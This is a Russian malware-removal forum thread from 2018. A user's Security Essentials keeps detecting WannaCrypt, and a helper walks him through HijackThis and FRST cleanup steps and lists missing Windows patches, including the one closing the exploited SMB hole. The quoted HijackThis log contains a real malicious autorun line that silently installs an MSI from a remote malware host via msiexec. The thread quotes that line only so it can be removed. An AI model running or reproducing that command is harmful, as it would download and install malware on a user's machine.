MSE находит, но не может удалить вирусы

**alfonsomefesto** · 03.10.2018, 15:31

Пару дней назад скачал и установил программу HDDlife, после этого установленный на пк MSE стал находить вирусы трояны и вирусы такого типа Ransom:Win32/Wannacrypt.A!rsm. Но он их только обнаруживает, в карантин антивирус их не помещает. При обнаружении выводит следующее сообщение: "Произошла следующая ошибка: Код ошибки 0x80508023. Не удалось найти вредоносные и другие потенциально нежелательные программы на этом компьютере".
Утилитой cureit от доктора веба вчера поставил комп на полную проверку в безопасном режиме. И ничего не обнаружено(( а сегодня MSE продолжает их обнаруживать.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 03.10.2018, 15:33

Уважаемый(ая) alfonsomefesto, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 03.10.2018, 16:04

Запустите HijackThis, расположенный в папке Autologger и пофиксите только указанные ниже строки (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
O4 - MSConfig\startupreg: 2Gis Update Notifier [command] = C:\Program Files (x86)\2gis\3.0\2GISTrayNotifier.exe -delayed_start (file missing) (HKLM) (2016/07/24)
O4 - MSConfig\startupreg: APSDaemon [command] = C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe  (file missing) (HKLM) (2013/11/04)
O4 - MSConfig\startupreg: AceStream [command] = C:\Users\Artur\AppData\Roaming\ACEStream\engine\ace_engine.exe  (file missing) (HKCU) (2015/05/15)
O4 - MSConfig\startupreg: AceUpdater [command] = C:\Users\Artur\AppData\Roaming\ACEStream\updater\ace_update.exe  (file missing) (HKCU) (2017/09/21)
O4 - MSConfig\startupreg: DAEMON Tools Lite [command] = C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe -autorun (file missing) (HKCU) (2015/05/15)
O4 - MSConfig\startupreg: QuickTime Task [command] = C:\Program Files (x86)\QuickTime\QTTask.exe -atboottime (file missing) (HKLM) (2015/01/25)
O4 - MSConfig\startupreg: Zune Launcher [command] = C:\Program Files\Zune\ZuneLauncher.exe  (file missing) (HKLM) (2013/11/04)
O4 - MSConfig\startupreg: iTunesHelper [command] = C:\Program Files\iTunes\iTunesHelper.exe  (file missing) (HKLM) (2017/07/13)
O22 - Task: {05A25A72-848B-42DB-9A4F-679F270839E8} - D:\Games\Half-Life\Launcher.exe (file missing)
O22 - Task: {1FEC0DC5-8946-425B-93D2-F00632C0E9DA} - D:\Games\Call of Duty Black Ops 2\t6sp.exe (file missing)
O22 - Task: {31230182-83C5-4FD7-A156-2A8B46D39734} - D:\Games\Half-Life\Launcher.exe (file missing)
O22 - Task: {6D868F7E-605A-41C7-809E-48ECB456F840} - D:\Games\Call of Duty Black Ops 2\t6sp.exe (file missing)
O22 - Task: {A2FC4C38-15C1-4D88-9429-16B31FE22CC6} - C:\Windows\system32\pcalua.exe -a F:\ENGLO.EXE -d F:\
O22 - Task: {A738F913-8F66-44BC-A0F5-33603EABAEEF} - D:\Games\Counter Strike 1.6 Русская v44\hl.exe (file missing)
O22 - Task: {C77E4949-F50C-4E53-B920-E9EE8ADBB9A7} - D:\Games\Counter Strike 1.6 Русская v44\hl.exe (file missing)
O22 - Task: {E6753495-AE16-46B6-864D-21BFB4D48A47} - D:\Games\Half-Life\Launcher.exe (file missing)

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.

**alfonsomefesto** · 03.10.2018, 17:20

Отчеты FRST и Addition

- - - - -Добавлено - - - - -

Отчет security check

**Vvvyg** · 03.10.2018, 20:13

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

CreateRestorePoint:
Startup: C:\Users\Artur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDDlife.lnk [2018-10-01]
ShortcutTarget: HDDlife.lnk -> C:\Program Files (x86)\BinarySense\HDDlife 4\HDDlifePro.exe (No File)
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{6a75e83c-0d9e-4206-93a4-5622f37b8be3} <==== ATTENTION (Restriction - IP)
CHR Profile: C:\Users\Artur\AppData\Local\Google\Chrome\User Data\Guest Profile [2017-07-28]
CHR Profile: C:\Users\Artur\AppData\Local\Google\Chrome\User Data\System Profile [2017-07-28]
CHR HKU\S-1-5-21-987283307-3976131722-1584321918-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-987283307-3976131722-1584321918-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx
S3 4F963E1A9E26C272; \??\C:\Users\Artur\AppData\Local\Temp\1A6E67FC.sys [X] <==== ATTENTION
S3 netr28ux; system32\DRIVERS\netr28ux.sys [X]
Virustotal: C:\Users\Artur\Downloads\ProTanki_Modpack.exe
2018-10-01 14:32 - 2018-10-01 14:32 - 000000000 ____D C:\Users\Artur\AppData\Roaming\BinarySense
2014-11-21 21:49 - 2014-11-20 09:49 - 000000044 ____H () C:\Program Files (x86)\b62fb40b.tmp
Task: {FA1985BB-1CDE-4112-86DE-323338127260} - \Mysa -> No File <==== ATTENTION
Reboot:

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры,
Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Обязательно установите обновлнения:

------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 Внимание! Скачать обновления
HotFix KB3140735 Внимание! Скачать обновления
HotFix KB3138910 Внимание! Скачать обновления
HotFix KB3138962 Внимание! Скачать обновления
HotFix KB3145739 Внимание! Скачать обновления
HotFix KB3146963 Внимание! Скачать обновления
HotFix KB3156013 Внимание! Скачать обновления
HotFix KB3156016 Внимание! Скачать обновления
HotFix KB3156019 Внимание! Скачать обновления
HotFix KB3155178 Внимание! Скачать обновления
HotFix KB3153171 Внимание! Скачать обновления
HotFix KB3170455 Внимание! Скачать обновления
HotFix KB3178034 Внимание! Скачать обновления
HotFix KB3185911 Внимание! Скачать обновления
HotFix KB3184122 Внимание! Скачать обновления
HotFix KB3192391 Внимание! Скачать обновления
HotFix KB3197867 Внимание! Скачать обновления
HotFix KB3205394 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4019263 Внимание! Скачать обновления
HotFix KB4022722 Внимание! Скачать обновления
HotFix KB4015546 Внимание! Скачать обновления
HotFix KB4025337 Внимание! Скачать обновления
HotFix KB4034679 Внимание! Скачать обновления
HotFix KB4041678 Внимание! Скачать обновления
HotFix KB4056894 Внимание! Скачать обновления
HotFix KB4056897 Внимание! Скачать обновления
HotFix KB4074587 Внимание! Скачать обновления
HotFix KB4103712 Внимание! Скачать обновления
HotFix KB4343899 Внимание! Скачать обновления
HotFix KB4457145 Внимание! Скачать обновления

Это только критические хотфиксы, включая KB4012212, который закрывает опаснейшую уязвимость, используемую в т. ч. нашумевшими в прошлом году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами. И в логах явные признаки проникновения именно через эту дыру, отчего MSE и не может справиться с угрозой.

Обновите антивирус:

Microsoft Security Essentials v.4.6.305.0 Внимание! Скачать обновления

Обновите, а лучше совсем удалите:

Microsoft Silverlight v.5.1.30514.0 Внимание! Скачать обновления

Java 8 Update 45 v.8.0.450 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u181-windows-i586.exe)^

Если не знаете, для какого именно приложения нужна Java - удалите, это устаревшая версия со множеством критических уязвимостей.

Обновите:

Adobe Acrobat Reader DC - Russian v.18.011.20063 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - Проверить обновления!^
------------------------------- [ Browser ] -------------------------------
Yandex v.18.9.0.3467 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^

**alfonsomefesto** · 04.10.2018, 11:05

Добрый день, прошу прощения, вчера уже не смог ответить.
Отчет Fixlog во вложении.
Все пакеты обновления скачал, установил.
MSE обновил.
Microsoft silverlight и java удалил.
Браузер яндекс и adobe также обновил.

**Vvvyg** · 04.10.2018, 19:48

Антивирус не ругается?

**alfonsomefesto** · 05.10.2018, 10:30

Доброе утро, антивирус больше не ругается. Последнее обнаружение датировано в день моего обращения к вам (на скриншотах во вложении).
Подскажите пожалуйста, вирусы теперь удалены или мне еще раз на полной проверке прогнать ПК?